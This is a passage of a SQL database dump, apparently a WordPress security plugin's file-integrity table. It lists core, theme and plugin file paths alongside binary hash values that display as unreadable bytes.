&��-��B�����J�ȸ!','',0,'?'),('�L���yE�{��f�','wp-includes/css/dashicons.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֍k����U�о�3�','|�38�9&ΚG�\"#��\0̠��;���e�R�','',0,'?'),('�R�C@�����4�I','wp-content/themes/sg-window/inc/js/customize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\nN|��\\���','�kᷕlA)�f?Rx��&���ڭ�FY�\n','',0,'?'),('�g�bf�\r\Z��ъ�','wp-includes/blocks/rss/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5��b�ͧ�J9v�OU','�`5��%��eh/@����7\\����):�p�~','',0,'?'),('�k�UL��ǡ�$���','wp-admin/ms-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','³u~]�*C�u�\0�','e�s}k�_��q}���~G���[�5�Q�u�!�','',0,'?'),('�o/N���t$�$���|','wp-content/themes/twentytwentyone/assets/sass/05-blocks/code/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�~����r�㵠ƿ�r','�M�:�@�{��ŕ�	!�-L	ď�\n�!�5�','',0,'?'),('�o�?�Dj!gӭ��-','wp-content/plugins/wordpress-seo/admin/google_search_console/class-gsc-config.php',0,'U�*�0�M���','U�*�0�M���',';rk]���̰)3��\ne�\"?{@X��@@�,�+','',0,'?'),('��=��-Xԍn{]�pf','wp-includes/js/wp-embed-template.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lq3UN�:�9�:^E��','3R�X�o��}Q��P��b�������J��','',0,'?'),('��we�i!<��s�y\n','wp-content/plugins/wordfence/views/scanner/issue-optionBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t��\"N��+�՛L�','�67�E0�܃�ՐC�{\\a�dPb�2�+�pW;P�','',0,'?'),('�����۝w6Uu%��','wp-includes/js/dist/vendor/wp-polyfill-element-closest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<j��� �<Yt�#�&','yNOBӻ�]&6�M�-��J��.�����:.�{','',0,'?'),('���ʟ��BG���,x(','wp-content/themes/square/inc/widgets/widget-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�fR�1/� >�c','\\�JI|�ΣP��7�\\6@Us)��fЦ���}','',0,'?'),('���fSu�B�ͥ?^yO','wp-admin/css/themes.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.���[���r����԰','��c��*Jw��o�a\'T���*#�UT�%�f','',0,'?'),('������|,v����','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.zh-CN.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Jam�=E�B���N�h�','Mg�鰤Q���u}lХ6�AG��t��UI\0','',0,'?'),('����{^��W����C�','wp-admin/css/colors/ocean/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�4H@혯����Gk','V��u�*�I�҉�26㶐k\\ ���\r','',0,'?'),('��M�ZxK� ��t�ߴ','wp-content/plugins/contact-form-7/languages/contact-form-7-ht.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-�]��yl���֬j','6���-�7z��`�0��Gӝ\0����/ˠQ','',0,'?'),('����	��*Q��^','wp-content/themes/twentytwentyone/assets/sass/05-blocks/html/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c\'[�g`.Ƿ{k','�{K��.(��\Z�\0����<��!rv�+=8���','',0,'?'),('��3T,�M��	nÀ�4�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/video/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���@ۓb�����hX�','�ڊ�j�9�y���v\n�oC/�`��ny','',0,'?'),('��q��{~[��?Ӿ�3','wp-content/themes/travelify/languages/zh_CN.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�x��8�\0rC�e','?cB߆��*n�:�?�P.d��XC��\'�N','',0,'?'),('���-�]�\r�~(#�','wp-content/plugins/wordpress-seo/admin/class-admin.php',0,'��m\'\'}[��Y�jOD�','��m\'\'}[��Y�jOD�','�s*�zAPG�	te+��~�1�6	�ǒA�h','',0,'?'),('��b��֏�� �$;�h','wp-content/themes/twentytwentyone/assets/sass/05-blocks/heading/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���D�Vr�|HH�','���Ҵ?5��n���P6ֆ�>�{\0-x��e','',0,'?'),('������~�,�`��˓','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.co.za.php',0,'���qt�(��D�2r\ry','���qt�(��D�2r\ry','�U�kIx��3ϕ�+��V���e}�v<��S�','',0,'?'),('��\"rl��=G�xX�^','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/tabs/static.php',0,'�P.2�[K�6��H���','�P.2�[K�6��H���','�끔��f�����go\'���r�F�uC��','',0,'?'),('��$[��tCŤIw','wp-includes/sodium_compat/src/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�	��,��~�r�','L>���e������h�\rF$�C�V������7�','',0,'?'),('��I>[��t�M�NY5','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.fi.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';.��~�\Z;���a�e','+��^�M|DB/`W�b�u5��O�!,;=(M�','',0,'?'),('��	��q���^ɑ+/','wp-content/themes/square/css/fonts/fontawesome-webfont.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|n���p��v&�','�1+<K�M��˷F@&R̲���t|a==m��R�','',0,'?'),('��v��:%�WO�:�','wp-content/themes/tortuga/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��٤;�[/��U(.x','_VQ�I�a>��G�b9���_/���A��fM','',0,'?'),('�m5��u����1}�','wp-includes/css/dist/block-library/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ܓ��pKjqӥ�\Z','��W��]�����o��{&q\"�������','',0,'?'),('��g3>3��*aE�V�','wp-content/themes/the-minimal/fonts/fontawesome-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2@N�*�ؿ�B\'�F','���č��oz�0u�����G;B.#CCV��','',0,'?'),('��&B�5V�AUU,��','wp-includes/class-wp-http-cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`=Y=��3���p*���','�n�<o��%�/�U\"y�\"���)�����B�','',0,'?'),('�1A��bȱ��8��EN','wp-includes/blocks/group/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���q���Z��Y{�','�.�r��Q�=�C!N[��O�{S�Q=�֊���NE','',0,'?'),('�C��$�����KIg�M','wp-content/themes/hueman/assets/front/img/header/nyc-280.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','횹�HgI�b�$�]�','%�є#�.��r;-���}�\'�H��z֚W��G�','',0,'?'),('�M|t�/�틎��?�D','wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/google/service/Google_Model.php',0,'Op{�p��{f�NZ�','Op{�p��{f�NZ�','%�=m�&�����?����\0��1F��ZZ','',0,'?'),('�X�˕�g��M���݅','wp-content/themes/illdy/layout/css/pace.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q^[l����w���','����D�F�\"�$��0��-�N$��jQ@}�','',0,'?'),('�_f��;w�a��ځ�','wp-includes/js/tinymce/skins/wordpress/images/gallery.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_���Pw��PU�4','<W~���ض��+�hN��9��1�_�3�w�s','',0,'?'),('�`>�soOX?�\0\n�d�B','wp-content/themes/mh-magazine-lite/admin/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�!�(-x����]{','ī����Y�P�FD�{���P�\Z�','',0,'?'),('�g�ӨH7\ng��3L','wp-content/themes/twentytwenty/assets/js/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ln��>�+�M��,','!�7U�`���^��:��8��o�_: � ','',0,'?'),('�u��<e�x��@ֈˆ>','wp-includes/js/underscore.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' >��>��S����b�%',' ʍ��LM>	�ύ��5́kv��k�PHɇ0','',0,'?'),('�z�,��� +�X` ��','wp-content/themes/fabulous-fluid/images/featured-6.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H��e�Ld���','��Y��d�b�=J�S\r}����G�1��>��w','',0,'?'),('���])T�����N25F�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidRequestException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GR˗c��?qt�','֝Rz5B�,��nɲ�����\nHoڨ��|','',0,'?'),('��q?%�rp��0�7�q','wp-admin/css/colors/coffee/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�H�.~շ)+\n�','w��\0����/$�D̀���Q��U�)M���Q','',0,'?'),('��P�Nj��醛G�;��','wp-content/themes/hueman/assets/front/img/thumb-standard-empty.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7����?G�\rǁ9/�','��x�M%_���>�ej\\Z�ϸ$�@-h�','',0,'?'),('��-[����S�_عQ�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/IpAddressNotFoundException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1:��!�G~�q�ic','^�DCguPT!>����W��\Z���k�~_5\n8','',0,'?'),('�����m{\ns߈z','wp-content/themes/relia/inc/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}���	J�;�Ek',',S��`d����\\Y|�l��r�4�Y�ʊ:k�g','',0,'?'),('��-CC���U\'�����&','wp-content/themes/verbosa/admin/images/magazine-3col.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TGo�0��\'RŷC���','���E�yf0C⛶��iS^wl��a�)?\\��+','',0,'?'),('��(Szv�Z;�g��6','wp-content/themes/nirvana/fonts/Oswald-Light-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Aa����d��j��','��v�!|�HJ)����E��Qg&9�*���D','',0,'?'),('������7r#J�[','wp-content/themes/precious-lite/images/hr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Y�oS����I ','v�v��<r��!��<yOo�����S����','',0,'?'),('����mbZ�c}�L��.','wp-content/themes/fabulous-fluid/inc/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+嵿q��g��g�w�e','1�n\'P���\"�i����F�^�:.��(��2�','',0,'?'),('��;��K�P[�լ���','wp-content/themes/twentytwenty/assets/images/2020-three-quarters-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u$���N����\r6','��Y0�‚�hb_�%��/��_1�$Z�~xψ','',0,'?'),('��zvo:���B%���','wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�h���%u-C�\0�','\"Y¤&6HU�^��\'�$���=_;>����','',0,'?'),('����x�Й�)DC��<','wp-includes/js/customize-models.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'�~G~�Ԟ�','�h�3XVx�p��T��OS‘Sfb��\r�E捵�','',0,'?'),('�~����U�\"�&��','wp-includes/images/wpicons-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n�V�o�$��Of~7','�]کA=�ђ�%�q�%aM�����B�U�p','',0,'?'),('� +���0=��x','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.sl.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����}̺�a��⠚','˲��[ĻҐ�b��<��湗O�KT�f>�k)','',0,'?'),('���D�@\"���̻�:','wp-content/themes/mh-magazine-lite/includes/widgets/mh-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,~��F��O��I�','w$�-zr?h��y�zc7\"|a�X]�b���t����','',0,'?'),('��W2��D��G�7�V','wp-admin/css/common-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O��ljXg[c� R�','؄��&���:�W��4���;\n�}��f�8D','',0,'?'),('��M��~\n�T|�','wp-includes/js/mediaelement/wp-mediaelement.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ꕂv��EK�‡?\r�~_','!?�[��_���r��=&�\n�-%!y��\r�','',0,'?'),('�\'����������N��','wp-content/themes/clean-magazine/images/headers/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z\rvX�J�U�TG���;','��nb+/���Hw���?~�\n�X�ގ�M�v<','',0,'?'),('�Vb(kt�W\"�6(;ƴ�','wp-admin/includes/class-wp-media-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�n�]hغ4�y��','�}m��~�%���<�᣹��.k����ꀣ���','',0,'?'),('�X��Jgr]��ճir{','wp-content/themes/hueman/assets/front/fonts/titillium-lightitalic-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�DJ�$ۚGY�_�','�gc/g���%��\Z�Ue�u���\r\rކ�t�','',0,'?'),('�Y�W��<����T�\n','wp-content/themes/sg-window/publication/inc/jetpack.php',0,'�5\'9�\r�h9ֵG�','�5\'9�\r�h9ֵG�','*A���\'�DZ��}��L��z���F�u��$�o','',0,'?'),('�iȜ�1��\0���8','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-php7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S;h8�^��g�R','��m�fʬ�����S�XT����8��A�-�g�','',0,'?'),('�k�E���浉3','wp-content/themes/hueman/assets/front/img/header/nyc.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�sx\'i�LY���b��','�f�Z\\B[� ,Ĵ���\\ۂ$��چŏ�U¸','',0,'?'),('�tfF	�r{�܇�_I�x','wp-includes/SimplePie/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+��dGzC\0��u\r��','a���,�\"���Ɣ_*{�Z��m���ɛ���','',0,'?'),('�x�䅶����~���','wp-content/themes/verbosa/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�?���uW�C3�','^�hXm�A���	�Y?�����M�x����@','',0,'?'),('�|]�D��\Z.�E','wp-content/plugins/wordfence/views/scanner/scan-progress-element.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���o�H?6\Z���x','(����%�����C��㏞�d�\"��A��','',0,'?'),('����;��m3�&2D8s','wp-content/themes/lightly/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@���v넚E�ǐ�;��','�&�zB]<���\"d�5z�y�;{�-6<�C	','',0,'?'),('���N-�q���\0��','wp-content/plugins/wordpress-seo/admin/views/tabs/tool/wpseo-import.php',0,'\r�3!�_����/�3c','\r�3!�_����/�3c','a;^rJ_�i�矑�dinB����Hl�k[���','',0,'?'),('�Ŏ��O�NJ�`','wp-content/plugins/all-in-one-wp-security-and-firewall/index.html',0,'��ُ\0��	��B~','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�Ӗ���T�E�\ZbE�h�','wp-content/themes/travelify/languages/hu_HU.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aa�Yc;��a� �;�','�S�����̎#��}�b?�hk��t����Ii?','',0,'?'),('���in�DH~�o^�','wp-content/themes/tortuga/inc/widgets/widget-magazine-posts-boxed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����[k�)�\r�z�','5�M�W�Z��/B�j�\Z�֡�y2C�a3�vN','',0,'?'),('�\n�ot}l�!E�`I','wp-content/themes/twentytwentyone/assets/sass/04-elements/misc.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m\0�\\��n�+��Ö','ƌ�%{�cUkw��\r��^p%���$L�`��','',0,'?'),('��߲;��0����','wp-includes/feed-rss2-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��6<�v�z�L','�3۸�kH��?�1B�g#~<X��gbe�','',0,'?'),('�Vw�#�_\Z���R*�','wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-digitalocean.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�c{�B��|�>���','��\n���� u��bI�&|�2��n�|�V��,�','',0,'?'),('�22�|�T�O����m�','wp-content/themes/point/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w�;��\'ɟ��#�#�','�(�Vj\'a����k��9?��p\\Ս���}���','',0,'?'),('�5X�xj�j�g%��:','wp-content/themes/point/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#�܁���x$B��','\'����)-���v&vn~y�{��<�.','',0,'?'),('�87�>�/�NTZ��y�v','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/km.js',0,'j��.����!En�lL�_','j��.����!En�lL�_','�����ܙ��k��BR�N[H�<�^�춯�\'','',0,'?'),('�9kBgW_�	��ܯ�\r','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.ir.php',0,'j���B�?��/|L','j���B�?��/|L','���|kI�as�إjH�%l�[L�K��5ѱ.�','',0,'?'),('�;�Y-ƿ��р�S�`','wp-content/themes/panoramic/languages/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϥ�ςe\'�b峬ޑ�','`~��z�&�G��)z|B��_Y�L��p�v','',0,'?'),('�<��g�=�C�״qD','wp-includes/customize/class-wp-customize-themes-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uZ���7ѳ����U','aMk��M.�ݚ�fJ>����{�V���>v2U','',0,'?'),('�K�M���߲M�ڇ','wp-content/themes/the-minimal/js/jquery.meanmenu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�E�8q��DS���','��.{s��D����s���\"~�]��)|�7���','',0,'?'),('�PC<��	���vn�R8','wp-content/plugins/wordfence/images/tools.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@cI�����','��Y��=������RB�)	~����ܖݟr','',0,'?'),('�Q7l���h�!ʗF�z�','wp-content/themes/travelify/library/panel/travelify-custom-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O�q�y\nk��\'�g','�Q$�����X���r�85�W<��Q��p','',0,'?'),('�QU���{E�Z��v�y','wp-content/themes/hueman/assets/front/fonts/titillium-light-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%Cu(��|�/�k�O','�\Z��X����Q|�U�0N�oP��T}@ء','',0,'?'),('�S�����	S��So','wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/google/Google_Client.php',0,'��0������#�q','��0������#�q',' K�_i�=C�<�ϭq:)�J*���C���','',0,'?'),('�T܀����1����[','wp-content/plugins/all-in-one-wp-migration/lib/view/import/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q]Hl�R��hu&�#','U�t(�z��w^�\Z���4���P��b�HuZ��','',0,'?'),('�^��X�$1��LN઒�','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.names4ever.php',0,'o������)˜�ḫ','o������)˜�ḫ','��d^xy�����Y�h�\"��߂�$�0�8�A','',0,'?'),('�m�CB.ե�>F_�#','wp-content/themes/twentynineteen/sass/media/_galleries.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�md��~����','�6�!1oAu�Eo���Fw�9\n4\0�\\%wM�\r�g','',0,'?'),('�v>�8��\'��T6���X','wp-includes/js/jquery/ui/progressbar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��=i�D��_zy�\r3','��_n�����)S����6�3+n�3���','',0,'?'),('��,��M��;v��','wp-content/plugins/wordfence/views/dashboard/options-group-import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3�%?b�����~\0','o~!��A3V�x|�t�;�\'�3�-�I�\n�','',0,'?'),('��3�T.^�ƙ<���','wp-mail.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^��p��C�!�Ԑ,','�����\0�\nIP�t}3RΘ/#����A�','',0,'?'),('���:T�L�5�EF�Vc','wp-content/themes/twentytwentyone/assets/sass/04-elements/links.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ȯ�Ty�Vd��.�ڋ�','����b}��X��ւW�R��i�`ID�f��b�','',0,'?'),('�������	\Z\'	�l�','wp-content/themes/hueman/option-tree/assets/images/ot-select-hover-rtl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�q��\r�ִ��줫','P o�@(�.:���J����\0��G�^~��C�p�','',0,'?'),('��\'��@S �D���','wp-content/plugins/wordfence/views/scanner/issue-control-ignore.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\na�g/�H��2*�e','n�R��Z�,�7G\'���fͺi߶�	�+!c��','',0,'?'),('��p�PoK�+&o4U8�','wp-content/plugins/unyson/framework/includes/option-types/typography-v2/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uFu�Du������Y','ӎ�B<��́��`���qY�����^��','',0,'?'),('���Z��8u�^�#s̃','wp-content/themes/illdy/layout/js/visible/visible.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���%<T��	�^Pa','4���?�86�?��~$���\nA-�@�!3D��','',0,'?'),('��t����7�^y�.��','wp-content/plugins/spam-captcha/core/img/tab_plug.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ÿ���L\'�	���h/','lA��~����4I�|>Z*���\'˱�IR�H','',0,'?'),('���*[�Tx���R��','wp-content/themes/hueman/assets/front/js/_parts/main.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o@$��0�xIw]','���Ʌ2��7J>9Q���6#�b6�Z6�G�,�','',0,'?'),('��x!+̀���0�C�H','wp-content/themes/precious-lite/js/custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vuә�uY�+�9[q���','�R2]���N�EDxq�8U�⹀�\"I&��]�','',0,'?'),('��l!&����i4��5','wp-content/themes/the-minimal/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�!��W�OO�a��c','{�����}��U�GZj�X�M��\'s8r�ft�/��','',0,'?'),('��K���OȖ9�3|<�','wp-admin/maint/repair.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#�xd�Y�l�� ٺn','\"�&*�	R͠�†��$2?��^8&�c�j\n�','',0,'?'),('�Ԧ��\Z��Ne�m�','wp-content/plugins/wordpress-seo/vendor/yoast/i18n-module/i18n-module.php',0,'q��\"^�3Ƽ���\n	','q��\"^�3Ƽ���\n	','��fVE��3M�D��4$���觰g�$v','',0,'?'),('�ֶ��^��y�h>�Ś','wp-content/themes/nirvana/js/jqueryui/css/ui-lightness/images/ui-bg_flat_10_000000_40x100.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���#��<��>/^|x','�jn�N\r�����+\r\Zd\'Ρ�b�Y�,Јg�','',0,'?'),('��V������mP/.�,','wp-content/themes/nirvana/fonts/sourcesanspro-extralight-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8I�=׀qW�5�ޜ��','5+Q� do��%c!��-�c��vN$G��<]��','',0,'?'),('��r}�P\'rM`�|e�','wp-content/themes/supernews/assets/library/Font-Awesome/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O��`G��7?O�V9ȿ','k�ս�e+�2@l�\Zu��rL��G0���s6A','',0,'?'),('��I���.$U0]\'�S_','wp-admin/includes/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZS-�.��G|J\"5','�Q�A.V�i��#\r�RJ���i.7�@B��d�','',0,'?'),('�	�u)�\ntT�V�\Z','wp-content/themes/hueman/assets/front/fonts/titillium-lightitalic-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�DFn�\0nau��PWΚ�','N�� ��d��e�{ҕdZ��#U��n�L^','',0,'?'),('��Qw�1��ߍ�;M�','wp-content/themes/hueman/assets/front/img/demo/1-520x245.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�;�W�̂l%N܊�','�ŃȚʞ����6����\r(�qV�yۙ��','',0,'?'),('�ԩ���iA��\'�e','wp-content/themes/barletta/screenshot.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�ï�@n�3����','ټ�x)�Dy�ՀW����z���&�ub+�U��','',0,'?'),('��+D�FܿTZ[H7','wp-admin/images/post-formats-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S�l��H\\�������','e�t���w|W�{x�y%K:��QE7������','',0,'?'),('�4��g�G�aGo��]','wp-content/themes/sg-window/inc/css/sidebar-widget.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�M\rq$��\nP�','��ܔZ\0�҂������5�>0��z�-;�Fa�u','',0,'?'),('�6A#F$L�����9','wp-content/themes/barletta/js/bootstrap.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�ܑb>���8���','���Q�(mk<T\n�^�t����K��PҸ�f�','',0,'?'),('�8.�hW�h�V�S','wp-content/themes/hueman/assets/front/img/sidebar/s-left-dual-full-expand.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o���pH\n�m�Oi��','F1:�p��\0�J3M�E�n�ۚIz�`�9�_�','',0,'?'),('�<�3�v��&F','wp-content/plugins/wordfence/views/scanner/scan-failed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"x�;���h�O���','��I}l�|U�j�Pr���7��ڲkV���`��','',0,'?'),('�=�fd�\\ӂv���','wp-content/plugins/contact-form-7/modules/listo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u˗�ů��|:Z�','��4\"eӾ��Q\'�_`S��ő~SznD�v^','',0,'?'),('�A?�]\\8�PMT�l','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C�B�)c��ae���','�[}���D���\0OV�:~-�\"~mBh\"<�pW�','',0,'?'),('�GV\\z��#���!;��','wp-includes/js/media-audiovideo.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f��}�юFǑ+���','���U��#�QC�F����F:,�}��u���KP','',0,'?'),('�M��s�;\',���-E','wp-admin/css/dashboard-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�!_���̕���8','&��P�k�[���x�:�=�r���B�_','',0,'?'),('�NF�z�B�Ga�F#��','wp-content/plugins/wordpress-seo/admin/views/partial-alerts-template.php',0,'/S�Vc���Ϭ:�','/S�Vc���Ϭ:�','�8:>��\r<غ������N&~�c|�o�','',0,'?'),('�O�r#��T�G��!','wp-includes/js/swfobject.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���,�I}p�e~2�q�','?��Lw���.�4M��ՒF�J�>fI�鴆�','',0,'?'),('�XS�,��K�r�','wp-content/themes/verbosa/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�YF�u��Z���;��','�0N1��^C<.��,8ɏ-j�WPg�{�6�9�','',0,'?'),('�l&�*������&','wp-includes/SimplePie/Content/Type/Sniffer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JVP�t>%N����\0','\n��S/��̼#@��%���,�ul��$t���T��','',0,'?'),('�piQ�^�l�u�����J','wp-content/plugins/wordpress-seo/admin/class-plugin-availability.php',0,'���ZlO���_�R�','���ZlO���_�R�','w��3N:Q�TV��¡8�>�<�v�DP','',0,'?'),('�x$�!\r�q)?&�`s','wp-content/themes/hueman/assets/czr/css/czr-control.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n �Q^Su�?�c�','Z�D{���ӟ�1z�s��	��U�p`M�j�','',0,'?'),('�|�􁎹s�C1�=�7','wp-content/plugins/wordpress-seo/js/dist/wp-seo-admin-350.min.js',0,'��w�#��kĕ( ���','��w�#��kĕ( ���','n�Wԝ\\\Z��_ʍ��\0���c�\"�\\l��> 1K','',0,'?'),('���$(�g�(���P��/','wp-admin/css/wp-admin-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�Q5\'EY�o�0�}�_�','0�|TF����O 	